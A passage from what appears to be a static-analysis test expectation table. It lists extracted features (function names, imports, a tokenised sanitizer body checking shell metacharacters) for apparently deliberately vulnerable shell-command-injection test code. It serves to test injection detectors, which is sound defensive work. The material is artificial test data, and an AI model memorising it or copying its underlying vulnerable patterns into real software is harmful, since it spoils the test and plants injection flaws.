yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:379:15 | s[i] == ... === '<' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:380:15 | s[i] == ... === '*' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:380:15 | s[i] == ... === '*' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:380:15 | s[i] == ... === '*' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:380:15 | s[i] == ... === '*' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:380:15 | s[i] == ... === '*' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:381:15 | s[i] == ... === '?' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:381:15 | s[i] == ... === '?' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:381:15 | s[i] == ... === '?' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:381:15 | s[i] == ... === '?' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:381:15 | s[i] == ... === '?' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:382:15 | s[i] == ... === '[' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:382:15 | s[i] == ... === '[' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:382:15 | s[i] == ... === '[' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:382:15 | s[i] == ... === '[' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:382:15 | s[i] == ... === '[' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:383:15 | s[i] == ... === ']' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:383:15 | s[i] == ... === ']' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:383:15 | s[i] == ... === ']' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:383:15 | s[i] == ... === ']' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:383:15 | s[i] == ... === ']' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:384:15 | s[i] == ... === '\|' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:384:15 | s[i] == ... === '\|' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:384:15 | s[i] == ... === '\|' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:384:15 | s[i] == ... === '\|' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:384:15 | s[i] == ... === '\|' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:385:15 | s[i] == ... === '\\u02da' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:385:15 | s[i] == ... === '\\u02da' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:385:15 | s[i] == ... === '\\u02da' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:385:15 | s[i] == ... === '\\u02da' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:385:15 | s[i] == ... === '\\u02da' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:386:15 | s[i] == ... === '$' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:386:15 | s[i] == ... === '$' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:386:15 | s[i] == ... === '$' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:386:15 | s[i] == ... === '$' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:386:15 | s[i] == ... === '$' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:387:15 | s[i] == ... === ';' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:387:15 | s[i] == ... === ';' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:387:15 | s[i] == ... === ';' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:387:15 | s[i] == ... === ';' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:387:15 | s[i] == ... === ';' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:388:15 | s[i] == ... === '&' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:388:15 | s[i] == ... === '&' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:388:15 | s[i] == ... === '&' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:388:15 | s[i] == ... === '&' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:388:15 | s[i] == ... === '&' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:389:15 | s[i] == ... === '(' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:389:15 | s[i] == ... === '(' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:389:15 | s[i] == ... === '(' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:389:15 | s[i] == ... === '(' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:389:15 | s[i] == ... === '(' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:390:15 | s[i] == ... === ')' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:390:15 | s[i] == ... === ')' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:390:15 | s[i] == ... === ')' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:390:15 | s[i] == ... === ')' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:390:15 | s[i] == ... === ')' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:391:15 | s[i] == ... === ']' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:391:15 | s[i] == ... === ']' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:391:15 | s[i] == ... === ']' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:391:15 | s[i] == ... === ']' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:391:15 | s[i] == ... === ']' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:392:15 | s[i] == ... === '#' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:392:15 | s[i] == ... === '#' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:392:15 | s[i] == ... === '#' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:392:15 | s[i] == ... === '#' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:392:15 | s[i] == ... === '#' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:393:16 | s[i] == ... == '\\\\' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 